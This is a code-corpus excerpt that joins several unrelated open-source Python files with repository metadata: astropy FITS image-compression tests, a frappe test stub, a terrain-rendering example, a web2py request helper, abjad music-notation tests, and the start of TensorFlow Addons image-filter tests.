"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/198"""
rng = np.random.RandomState(seed=42)
noise = rng.normal(size=(20, 20))
chdu1 = fits.CompImageHDU(data=noise, compression_type='GZIP_1')
# First make a test image with lossy compression and make sure it
# wasn't compressed perfectly. This shouldn't happen ever, but just to
# make sure the test non-trivial.
chdu1.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as h:
assert np.abs(noise - h[1].data).max() > 0.0
del h
chdu2 = fits.CompImageHDU(data=noise, compression_type='GZIP_1',
quantize_level=0.0) # No quantization
with ignore_warnings():
chdu2.writeto(self.temp('test.fits'), overwrite=True)
with fits.open(self.temp('test.fits')) as h:
assert (noise == h[1].data).all()
def test_compression_column_tforms(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/199"""
# Some interestingly tiled data so that some of it is quantized and
# some of it ends up just getting gzip-compressed
data2 = ((np.arange(1, 8, dtype=np.float32) * 10)[:, np.newaxis] +
np.arange(1, 7))
np.random.seed(1337)
data1 = np.random.uniform(size=(6 * 4, 7 * 4))
data1[:data2.shape[0], :data2.shape[1]] = data2
chdu = fits.CompImageHDU(data1, compression_type='RICE_1',
tile_size=(6, 7))
chdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'),
disable_image_compression=True) as h:
assert re.match(r'^1PB\(\d+\)$', h[1].header['TFORM1'])
assert re.match(r'^1PB\(\d+\)$', h[1].header['TFORM2'])
def test_compression_update_header(self):
"""Regression test for
https://github.com/spacetelescope/PyFITS/issues/23
"""
self.copy_file('comp.fits')
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
hdul[1].header['test1'] = 'test'
hdul[1]._header['test2'] = 'test2'
with fits.open(self.temp('comp.fits')) as hdul:
assert 'test1' in hdul[1].header
assert hdul[1].header['test1'] == 'test'
assert 'test2' in hdul[1].header
assert hdul[1].header['test2'] == 'test2'
# Test update via index now:
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
hdr[hdr.index('TEST1')] = 'foo'
with fits.open(self.temp('comp.fits')) as hdul:
assert hdul[1].header['TEST1'] == 'foo'
# Test slice updates
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdul[1].header['TEST*'] = 'qux'
with fits.open(self.temp('comp.fits')) as hdul:
assert list(hdul[1].header['TEST*'].values()) == ['qux', 'qux']
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
idx = hdr.index('TEST1')
hdr[idx:idx + 2] = 'bar'
with fits.open(self.temp('comp.fits')) as hdul:
assert list(hdul[1].header['TEST*'].values()) == ['bar', 'bar']
# Test updating a specific COMMENT card duplicate
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdul[1].header[('COMMENT', 1)] = 'I am fire. I am death!'
with fits.open(self.temp('comp.fits')) as hdul:
assert hdul[1].header['COMMENT'][1] == 'I am fire. I am death!'
assert hdul[1]._header['COMMENT'][1] == 'I am fire. I am death!'
# Test deleting by keyword and by slice
with fits.open(self.temp('comp.fits'), mode='update') as hdul:
hdr = hdul[1].header
del hdr['COMMENT']
idx = hdr.index('TEST1')
del hdr[idx:idx + 2]
with fits.open(self.temp('comp.fits')) as hdul:
assert 'COMMENT' not in hdul[1].header
assert 'COMMENT' not in hdul[1]._header
assert 'TEST1' not in hdul[1].header
assert 'TEST1' not in hdul[1]._header
assert 'TEST2' not in hdul[1].header
assert 'TEST2' not in hdul[1]._header
def test_compression_update_header_with_reserved(self):
"""
Ensure that setting reserved keywords related to the table data
structure on CompImageHDU image headers fails.
"""
def test_set_keyword(hdr, keyword, value):
with catch_warnings() as w:
hdr[keyword] = value
assert len(w) == 1
assert str(w[0].message).startswith(
f"Keyword {keyword!r} is reserved")
assert keyword not in hdr
with fits.open(self.data('comp.fits')) as hdul:
hdr = hdul[1].header
test_set_keyword(hdr, 'TFIELDS', 8)
test_set_keyword(hdr, 'TTYPE1', 'Foo')
test_set_keyword(hdr, 'ZCMPTYPE', 'ASDF')
test_set_keyword(hdr, 'ZVAL1', 'Foo')
def test_compression_header_append(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
with catch_warnings() as w:
imghdr.append('TFIELDS')
assert len(w) == 1
assert 'TFIELDS' not in imghdr
imghdr.append(('FOO', 'bar', 'qux'), end=True)
assert 'FOO' in imghdr
assert imghdr[-1] == 'bar'
assert 'FOO' in tblhdr
assert tblhdr[-1] == 'bar'
imghdr.append(('CHECKSUM', 'abcd1234'))
assert 'CHECKSUM' in imghdr
assert imghdr['CHECKSUM'] == 'abcd1234'
assert 'CHECKSUM' not in tblhdr
assert 'ZHECKSUM' in tblhdr
assert tblhdr['ZHECKSUM'] == 'abcd1234'
def test_compression_header_append2(self):
"""
Regresion test for issue https://github.com/astropy/astropy/issues/5827
"""
with fits.open(self.data('comp.fits')) as hdul:
header = hdul[1].header
while (len(header) < 1000):
header.append() # pad with grow room
# Append stats to header:
header.append(("Q1_OSAVG", 1, "[adu] quadrant 1 overscan mean"))
header.append(("Q1_OSSTD", 1, "[adu] quadrant 1 overscan stddev"))
header.append(("Q1_OSMED", 1, "[adu] quadrant 1 overscan median"))
def test_compression_header_insert(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
# First try inserting a restricted keyword
with catch_warnings() as w:
imghdr.insert(1000, 'TFIELDS')
assert len(w) == 1
assert 'TFIELDS' not in imghdr
assert tblhdr.count('TFIELDS') == 1
# First try keyword-relative insert
imghdr.insert('TELESCOP', ('OBSERVER', 'Phil Plait'))
assert 'OBSERVER' in imghdr
assert imghdr.index('OBSERVER') == imghdr.index('TELESCOP') - 1
assert 'OBSERVER' in tblhdr
assert tblhdr.index('OBSERVER') == tblhdr.index('TELESCOP') - 1
# Next let's see if an index-relative insert winds up being
# sensible
idx = imghdr.index('OBSERVER')
imghdr.insert('OBSERVER', ('FOO',))
assert 'FOO' in imghdr
assert imghdr.index('FOO') == idx
assert 'FOO' in tblhdr
assert tblhdr.index('FOO') == tblhdr.index('OBSERVER') - 1
def test_compression_header_set_before_after(self):
with fits.open(self.data('comp.fits')) as hdul:
imghdr = hdul[1].header
tblhdr = hdul[1]._header
with catch_warnings() as w:
imghdr.set('ZBITPIX', 77, 'asdf', after='XTENSION')
assert len(w) == 1
assert 'ZBITPIX' not in imghdr
assert tblhdr.count('ZBITPIX') == 1
assert tblhdr['ZBITPIX'] != 77
# Move GCOUNT before PCOUNT (not that there's any reason you'd
# *want* to do that, but it's just a test...)
imghdr.set('GCOUNT', 99, before='PCOUNT')
assert imghdr.index('GCOUNT') == imghdr.index('PCOUNT') - 1
assert imghdr['GCOUNT'] == 99
assert tblhdr.index('ZGCOUNT') == tblhdr.index('ZPCOUNT') - 1
assert tblhdr['ZGCOUNT'] == 99
assert tblhdr.index('PCOUNT') == 5
assert tblhdr.index('GCOUNT') == 6
assert tblhdr['GCOUNT'] == 1
imghdr.set('GCOUNT', 2, after='PCOUNT')
assert imghdr.index('GCOUNT') == imghdr.index('PCOUNT') + 1
assert imghdr['GCOUNT'] == 2
assert tblhdr.index('ZGCOUNT') == tblhdr.index('ZPCOUNT') + 1
assert tblhdr['ZGCOUNT'] == 2
assert tblhdr.index('PCOUNT') == 5
assert tblhdr.index('GCOUNT') == 6
assert tblhdr['GCOUNT'] == 1
def test_compression_header_append_commentary(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2363
"""
hdu = fits.CompImageHDU(np.array([0], dtype=np.int32))
hdu.header['COMMENT'] = 'hello world'
assert hdu.header['COMMENT'] == ['hello world']
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert hdul[1].header['COMMENT'] == ['hello world']
def test_compression_with_gzip_column(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/71
"""
arr = np.zeros((2, 7000), dtype='float32')
# The first row (which will be the first compressed tile) has a very
# wide range of values that will be difficult to quantize, and should
# result in use of a GZIP_COMPRESSED_DATA column
arr[0] = np.linspace(0, 1, 7000)
arr[1] = np.random.normal(size=7000)
hdu = fits.CompImageHDU(data=arr)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
comp_hdu = hdul[1]
# GZIP-compressed tile should compare exactly
assert np.all(comp_hdu.data[0] == arr[0])
# The second tile uses lossy compression and may be somewhat off,
# so we don't bother comparing it exactly
def test_duplicate_compression_header_keywords(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2750
Tests that the fake header (for the compressed image) can still be read
even if the real header contained a duplicate ZTENSION keyword (the
issue applies to any keyword specific to the compression convention,
however).
"""
arr = np.arange(100, dtype=np.int32)
hdu = fits.CompImageHDU(data=arr)
header = hdu._header
# append the duplicate keyword
hdu._header.append(('ZTENSION', 'IMAGE'))
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert header == hdul[1]._header
# There's no good reason to have a duplicate keyword, but
# technically it isn't invalid either :/
assert hdul[1]._header.count('ZTENSION') == 2
def test_scale_bzero_with_compressed_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
and https://github.com/astropy/astropy/issues/4588
Identical to test_scale_bzero_with_int_data() but uses a compressed
image.
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.CompImageHDU(data=a.copy())
hdu2 = fits.CompImageHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_compressed_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Identical to test_scale_back_uint_assignment() but uses a compressed
image.
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.CompImageHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as hdul:
hdul[1].data[:] = 0
assert np.allclose(hdul[1].data, 0)
def test_compressed_header_missing_znaxis(self):
a = np.arange(100, 200, dtype=np.uint16)
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZNAXIS')
with pytest.raises(KeyError):
comp_hdu.compressed_data
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZBITPIX')
with pytest.raises(KeyError):
comp_hdu.compressed_data
@pytest.mark.parametrize(
('keyword', 'dtype', 'expected'),
[('BSCALE', np.uint8, np.float32), ('BSCALE', np.int16, np.float32),
('BSCALE', np.int32, np.float64), ('BZERO', np.uint8, np.float32),
('BZERO', np.int16, np.float32), ('BZERO', np.int32, np.float64)])
def test_compressed_scaled_float(self, keyword, dtype, expected):
"""
If BSCALE,BZERO is set to floating point values, the image
should be floating-point.
https://github.com/astropy/astropy/pull/6492
Parameters
----------
keyword : `str`
Keyword to set to a floating-point value to trigger
floating-point pixels.
dtype : `numpy.dtype`
Type of original array.
expected : `numpy.dtype`
Expected type of uncompressed array.
"""
value = 1.23345 # A floating-point value
hdu = fits.CompImageHDU(np.arange(0, 10, dtype=dtype))
hdu.header[keyword] = value
hdu.writeto(self.temp('test.fits'))
del hdu
with fits.open(self.temp('test.fits')) as hdu:
assert hdu[1].header[keyword] == value
assert hdu[1].data.dtype == expected
@pytest.mark.parametrize('dtype', (np.uint8, np.int16, np.uint16, np.int32,
np.uint32))
def test_compressed_integers(self, dtype):
"""Test that the various integer dtypes are correctly written and read.
Regression test for https://github.com/astropy/astropy/issues/9072
"""
mid = np.iinfo(dtype).max // 2
data = np.arange(mid-50, mid+50, dtype=dtype)
testfile = self.temp('test.fits')
hdu = fits.CompImageHDU(data=data)
hdu.writeto(testfile, overwrite=True)
new = fits.getdata(testfile)
np.testing.assert_array_equal(data, new)
def test_comphdu_bscale(tmpdir):
"""
Regression test for a bug that caused extensions that used BZERO and BSCALE
that got turned into CompImageHDU to end up with BZERO/BSCALE before the
TFIELDS.
"""
filename1 = tmpdir.join('3hdus.fits').strpath
filename2 = tmpdir.join('3hdus_comp.fits').strpath
x = np.random.random((100, 100))*100
x0 = fits.PrimaryHDU()
x1 = fits.ImageHDU(np.array(x-50, dtype=int), uint=True)
x1.header['BZERO'] = 20331
x1.header['BSCALE'] = 2.3
hdus = fits.HDUList([x0, x1])
hdus.writeto(filename1)
# fitsverify (based on cfitsio) should fail on this file, only seeing the
# first HDU.
with fits.open(filename1) as hdus:
hdus[1] = fits.CompImageHDU(data=hdus[1].data.astype(np.uint32),
header=hdus[1].header)
hdus.writeto(filename2)
# open again and verify
with fits.open(filename2) as hdus:
hdus[1].verify('exception')
def test_scale_implicit_casting():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations.
hdu = fits.ImageHDU(np.array([1], dtype=np.int32))
hdu.scale(bzero=1.3)
def test_bzero_implicit_casting_compressed():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations. Astropy is
# actually not able to produce a file that triggers the failure - the
# issue occurs when using unsigned integer types in the FITS file, in which
# case BZERO should be 32768. But if the keyword is stored as 32768.0, then
# it was possible to trigger the implicit casting error.
filename = os.path.join(os.path.dirname(__file__),
'data', 'compressed_float_bzero.fits')
with fits.open(filename) as hdul:
hdu = hdul[1]
hdu.data
def test_bzero_mishandled_info(tmpdir):
# Regression test for #5507:
# Calling HDUList.info() on a dataset which applies a zeropoint
# from BZERO but which astropy.io.fits does not think it needs
# to resize to a new dtype results in an AttributeError.
filename = tmpdir.join('floatimg_with_bzero.fits').strpath
hdu = fits.ImageHDU(np.zeros((10, 10)))
hdu.header['BZERO'] = 10
hdu.writeto(filename, overwrite=True)
with fits.open(filename) as hdul:
hdul.info()
def test_image_write_readonly(tmpdir):
# Regression test to make sure that we can write out read-only arrays (#5512)
x = np.array([1, 2, 3])
x.setflags(write=False)
ghdu = fits.ImageHDU(data=x)
ghdu.add_datasum()
filename = tmpdir.join('test.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1, 2, 3])
# Same for compressed HDU
x = np.array([1.0, 2.0, 3.0])
x.setflags(write=False)
ghdu = fits.CompImageHDU(data=x)
# add_datasum does not work for CompImageHDU
# ghdu.add_datasum()
filename = tmpdir.join('test2.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1.0, 2.0, 3.0])
|
MSeifert04/astropy
|
astropy/io/fits/tests/test_image.py
|
Python
|
bsd-3-clause
| 76,391
| 0.000406
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCMPaperManagement(unittest.TestCase):
pass
|
sathishpy/corrugation
|
corrugation/corrugation/doctype/cm_paper_management/test_cm_paper_management.py
|
Python
|
gpl-3.0
| 227
| 0.008811
|
from collections import defaultdict
import colorsys
import pg
def noise(x, z):
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height[(x, z)] = noise(x, z)
colors[(x, z)] = generate_color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
vb = pg.VertexBuffer(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
|
kbrafford/pg
|
examples/terrain.py
|
Python
|
mit
| 2,927
| 0.00205
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
|
jyt109/termite-data-server
|
server_src/modules/core.py
|
Python
|
bsd-3-clause
| 4,206
| 0.07204
|
# -*- encoding: utf-8 -*-
from abjad import *
import pytest
def test_selectiontools_Parentage_logical_voice_01():
r'''An anonymous staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_02():
r'''A named staff and its contained unvoiced leaves share
the same signature.
'''
staff = Staff("c'8 d'8 e'8 f'8")
staff.name = 'foo'
containment = inspect_(staff).get_parentage().logical_voice
for component in iterate(staff).by_class():
assert inspect_(component).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_03():
r'''Leaves inside equally named sequential voices inside a staff
share the same signature.
'''
staff = Staff(Voice("c'8 d'8 e'8 f'8") * 2)
staff[0].name = 'foo'
staff[1].name = 'foo'
containment = inspect_(staff[0][0]).get_parentage().logical_voice
for leaf in staff.select_leaves():
assert inspect_(leaf).get_parentage().logical_voice == containment
def test_selectiontools_Parentage_logical_voice_04():
r'''Returns logical voice giving the root and
first voice, staff and score in the parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
assert systemtools.TestManager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] == signatures[1]
signatures[0] == signatures[2]
signatures[0] != signatures[4]
signatures[0] == signatures[6]
signatures[2] == signatures[0]
signatures[2] == signatures[3]
signatures[2] == signatures[4]
signatures[2] == signatures[6]
signatures[4] != signatures[0]
signatures[4] != signatures[2]
signatures[4] == signatures[5]
signatures[4] == signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
statement = 'attach(beam, container.select_leaves())'
assert pytest.raises(AssertionError, statement)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
signatures[0] == signatures[1]
signatures[0] != signatures[2]
signatures[2] != signatures[2]
signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] != signatures[1]
signatures[0] != signatures[2]
signatures[0] != signatures[3]
signatures[0] != signatures[4]
signatures[0] == signatures[5]
signatures[1] != signatures[0]
signatures[1] != signatures[2]
signatures[1] == signatures[3]
signatures[1] != signatures[4]
signatures[1] != signatures[5]
signatures[2] != signatures[0]
signatures[2] != signatures[1]
signatures[2] != signatures[3]
signatures[2] == signatures[4]
signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
r'''Unicorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_09():
r'''Notes appear in the same logical voice.
'''
t1 = Staff([Voice([Note(0, (1, 8))])])
t1.name = 'staff'
t1[0].name = 'voice'
t2 = Staff([Voice([Note(0, (1, 8))])])
t2.name = 'staff'
t2[0].name = 'voice'
t1_leaf_signature = inspect_(t1.select_leaves()[0]).get_parentage().logical_voice
t2_leaf_signature = inspect_(t2.select_leaves()[0]).get_parentage().logical_voice
assert t1_leaf_signature == t2_leaf_signature
def test_selectiontools_Parentage_logical_voice_10():
r'''Measure and leaves must carry same logical voice signature.
'''
staff = Staff(r'''
{
\time 2/8
c'8
d'8
}
e'8
f'8
''')
assert systemtools.TestManager.compare(
staff,
r'''
\new Staff {
{
\time 2/8
c'8
d'8
}
e'8
f'8
}
'''
)
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[0][0]).get_parentage().logical_voice
assert inspect_(staff[0][0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
def test_selectiontools_Parentage_logical_voice_11():
r'''Leaves inside different staves have different logical voice
signatures, even when the staves have the same name.
'''
container = Container(2 * Staff("c'8 c'8"))
container[0].name = container[1].name = 'staff'
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff" {
c'8
c'8
}
\context Staff = "staff" {
c'8
c'8
}
}
'''
)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
assert inspect_(leaves[0]).get_parentage().logical_voice == \
inspect_(leaves[1]).get_parentage().logical_voice
assert inspect_(leaves[0]).get_parentage().logical_voice != \
inspect_(leaves[2]).get_parentage().logical_voice
assert inspect_(leaves[2]).get_parentage().logical_voice == \
inspect_(leaves[3]).get_parentage().logical_voice
assert inspect_(leaves[2]).get_parentage().logical_voice != \
inspect_(leaves[0]).get_parentage().logical_voice
|
mscuthbert/abjad
|
abjad/tools/selectiontools/test/test_selectiontools_Parentage_logical_voice.py
|
Python
|
gpl-3.0
| 10,702
| 0.000748
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may noa use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pytest
import numpy as np
import tensorflow as tf
from tensorflow_addons.image import mean_filter2d
from tensorflow_addons.image import median_filter2d
from tensorflow_addons.image import gaussian_filter2d
from tensorflow_addons.utils import test_utils
from scipy.ndimage.filters import gaussian_filter
_dtypes_to_test = {
tf.dtypes.uint8,
tf.dtypes.int32,
tf.dtypes.float16,
tf.dtypes.float32,
tf.dtypes.float64,
}
_image_shapes_to_test = [
(3, 3, 1),
(3, 3, 3),
(1, 3, 3, 1),
(1, 3, 3, 3),
(2, 3, 3, 1),
(2, 3, 3, 3),
]
def tile_image(plane, image_shape):
"""Tile a 2-D image `plane` into 3-D or 4-D as per `image_shape`."""
assert 3 <= len(image_shape) <= 4
plane = tf.convert_to_tensor(plane)
plane = tf.expand_dims(plane, -1)
channels = image_shape[-1]
image = tf.tile(plane, (1, 1, channels))
if len(image_shape) == 4:
batch_size = image_shape[0]
image = tf.expand_dims(image, 0)
image = tf.tile(image, (batch_size, 1, 1, 1))
return image
def setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
):
assert 3 <= len(image_shape) <= 4
